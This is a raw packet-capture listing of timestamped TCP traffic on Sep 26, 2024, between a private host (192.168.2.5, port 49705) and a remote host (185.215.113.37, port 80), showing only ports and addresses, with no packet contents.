Sep 26, 2024 21:14:16.558727026 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.558739901 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.558758974 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.558945894 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.558959961 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.558969975 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.558979988 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.558990955 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.558994055 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.559001923 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.559014082 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.559015036 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.559025049 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.559027910 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.559036016 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.559048891 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.559077978 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.559263945 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.559276104 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.559312105 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.559429884 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.559442043 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.559452057 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.559462070 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.559473038 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.559478045 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.559487104 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.559492111 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.559503078 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.559511900 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.559514046 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.559525013 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.559535027 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.559536934 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.559547901 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.559551001 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.559560061 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.559576035 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.559576988 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.559587955 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.559598923 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.559602976 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.559609890 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.559618950 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.559621096 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.559633970 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.559642076 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.559648037 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.559653044 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.559664965 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.559681892 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.559695005 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.559695005 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.560338020 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.560349941 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.560359955 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.560369968 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.560379982 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.560388088 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.560390949 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.560401917 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.560411930 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.560414076 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.560424089 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.560429096 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.560437918 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.560446024 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.560447931 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.560461044 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.560471058 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.560477972 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.560482979 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.560492992 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.560499907 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.560504913 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.560516119 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.560518026 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.560527086 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.560535908 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.560539007 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.560550928 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.560559034 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.560563087 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.560583115 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.560600996 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.560897112 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.560914993 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.560945034 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.560960054 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.561075926 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.561088085 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.561098099 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.561108112 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.561117887 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.561125994 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.561130047 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.561141968 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.561151981 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.561167002 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.561181068 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.647347927 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.647404909 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.647417068 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.647439003 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.647459984 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.647471905 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.647483110 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.647485018 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.647500038 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.647505045 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.647526026 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.647543907 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.647615910 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.647664070 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.647701979 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.647749901 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.647763014 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.647773981 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.647845030 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.647845030 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.647851944 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.647865057 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.647876978 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.647897959 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.647929907 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.647943974 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.647994041 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.648318052 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.648369074 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.648375034 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.648380995 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.648413897 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.648428917 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.648500919 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.648511887 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.648525953 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.648546934 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.648566961 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.648576021 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.648586988 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.648597956 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.648622990 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.648648977 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.648699999 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.648713112 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.648729086 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.648740053 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.648751020 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.648751974 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.648762941 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.648772955 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.648787975 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.648811102 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.648994923 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.649005890 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.649015903 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.649028063 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.649044037 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.649048090 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.649058104 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.649070024 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.649072886 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.649080992 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.649087906 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.649116039 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.649137974 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.649333954 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.649344921 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.649354935 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.649367094 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.649375916 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.649384022 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.649389029 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.649401903 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.649411917 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.649413109 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.649422884 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.649446964 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.649692059 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.649702072 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.649712086 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.649729013 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.649739981 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.649740934 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.649758101 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.649761915 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.649765015 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.649771929 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.649786949 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.649823904 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.650026083 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.650038004 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.650057077 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.650065899 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.650074005 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.650078058 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.650090933 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.650094986 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.650101900 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.650113106 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.650124073 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.650136948 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.650149107 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.650157928 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.650175095 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.650183916 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.650187016 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.650187016 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.650187016 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.650197029 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.650207043 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.650217056 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.650227070 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.650228024 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.650239944 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.650248051 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.650252104 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.650269032 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.650285959 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.650938988 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.650954008 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.650964975 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.650974989 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.650985003 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.650986910 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.650995970 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.651005030 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.651009083 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.651020050 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.651031017 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.651034117 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.651041985 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.651053905 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.651058912 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.651065111 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.651077986 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.651077986 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.651089907 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.651093006 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.651103020 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.651113987 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.651118994 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.651125908 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.651135921 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.651143074 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.651148081 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.651160955 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.651164055 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.651170969 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.651175022 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.651201010 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.651221991 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.651853085 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.651865959 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.651875019 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.651885033 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.651895046 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.651906013 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.651907921 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.651916981 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.651926994 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.651933908 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.651937008 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.651943922 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.651952028 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.651958942 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.651961088 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.651963949 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.651977062 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.651978016 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.651993036 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.651999950 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.652004004 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.652017117 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.652026892 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.652039051 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.652039051 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.652065039 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.652652025 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.652663946 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.652673006 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.652688026 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.652700901 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.652714968 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.652739048 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.738133907 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.738161087 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.738172054 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.738226891 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.738269091 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.738285065 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.738296986 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.738307953 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.738318920 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.738334894 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.738363981 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.738394976 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.738404989 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.738450050 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.738466978 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.738476992 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.738487005 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.738513947 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.738529921 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.738590956 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.738604069 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.738614082 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.738624096 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.738639116 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.738667011 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.739484072 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.739520073 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.739531040 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.739536047 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.739554882 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.739576101 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.739635944 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.739646912 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.739656925 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.739666939 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.739682913 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.739712000 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.739900112 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.739909887 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.739919901 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.739931107 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.739940882 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.739950895 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.739952087 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.739964008 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.739969969 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:16.739974976 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:16.739981890 CEST	49705	80	192.168.2.5	185.215.113.37
